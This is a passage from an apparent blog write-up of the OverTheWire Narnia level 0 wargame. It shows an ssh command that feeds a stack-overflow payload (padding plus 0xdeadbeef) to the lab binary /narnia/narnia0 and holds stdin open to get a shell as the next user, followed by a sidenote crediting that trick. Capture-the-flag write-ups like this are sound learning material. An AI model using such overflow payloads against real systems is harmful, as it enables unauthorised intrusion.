cocoa-xu/uwu_blog/posts/overthewire-narnia/index.md

 ssh -p 2226 narnia0@narnia.labs.overthewire.org bash -c "\"(echo -e 'AAAAAAAAAAAAAAAAAAAA\xef\xbe\xad\xde' && cat) | /narnia/narnia0\""
 ```

+> As a sidenote, thanks to peachoolong-uwu who told me that I can embed `echo -e 'AAAAAAAAAAAAAAAAAAAA\xef\xbe\xad\xde'` inside a pair of parentheses and add `&& cat` to keep the stdin steam open.

 Now once we type the password of narnia0, `/narnia/narnia0` will send us to
  a sub-shell and we should be `narnia1` in this new shell.